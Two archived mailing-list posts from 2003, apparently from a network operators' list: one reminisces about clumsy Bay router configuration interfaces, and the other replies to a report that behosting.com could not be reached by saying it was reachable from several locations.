- Original Message - From: E.B. Dreger [EMAIL PROTECTED] To: [EMAIL PROTECTED] Cc: [EMAIL PROTECTED] Sent: Thursday, September 18, 2003 1:04 PM Subject: Re: Worst design decisions? You have reminded me of Bay's config GUI. I shall have nightmares tonight. Ah, the days when I used to work on Bay routers. I've trashed routers with the GUI. Ran like a dog on even the fastest machines. The CLI config isn't much better either The best thing though was finding that some of the Bay routers (the ARN mostly) had their CLI config ripped out to save space on the flash card. Half the time I was on site with a customer when I discovered this. I always carried a Mac laptop, so I was royally screwed. -- Brian Bruns The Summit Open Source Development Group Open Solutions For A Closed World / Anti-Spam Resources http://www.2mbit.com ICQ: 8077511
Re: Route failures to behosting.com
Hello, Attempts to access behosting.com were successful from several different locations, which included ameritech and sprint. I'm not going to include traceroutes here (if you would like them, I can email them to you privately). What ISPs are you using to try and get to them? -- Brian Bruns The Summit Open Source Development Group Open Solutions For A Closed World / Anti-Spam Resources http://www.2mbit.com ICQ: 8077511 - Original Message - From: Lou Katz [EMAIL PROTECTED] To: [EMAIL PROTECTED] Sent: Wednesday, September 17, 2003 9:23 PM Subject: Route failures to behosting.com I am unable to reach them via several different ISPs. It looks to my naive eyes like routes to them have vanished. Can anyone shed any light on this? -- -=[L]=-